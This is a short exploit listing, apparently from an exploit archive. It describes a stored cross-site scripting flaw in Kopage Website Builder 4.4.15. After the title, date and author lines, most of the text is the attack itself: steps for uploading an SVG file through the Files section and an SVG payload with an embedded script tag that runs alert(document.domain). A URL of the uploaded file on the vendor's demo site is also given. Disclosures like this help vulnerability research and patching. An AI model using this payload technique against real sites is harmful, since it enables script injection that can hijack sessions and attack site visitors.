Exploit for Kopage Website Builder 4.4.15 Cross Site Scripting

Name: Exploit for Kopage Website Builder 4.4.15 Cross Site Scripting
Rating: 5 (264 reviews)

2023-12-01 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:176026
#Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)  
#Date: 1/12/2023  
#Exploit Author: tmrswrr  
#Vendor Homepage: https://www.kopage.com/  
#Version: Version : 4.4.15  
#Tested on: https://demo.kopage.com/index.php  
  
  
#Poc:  
  
1 ) Install the system through the website and log in with any user.  
2 ) Go to Files field and click upload   
3 ) Upload your svg file  
  
Payload :  
  
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">  
<script>//<![CDATA[  
alert(document.domain)  
//]]>  
</script>  
</svg>  
  
4 ) Open svg file url you will be see alert button.  
  
Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg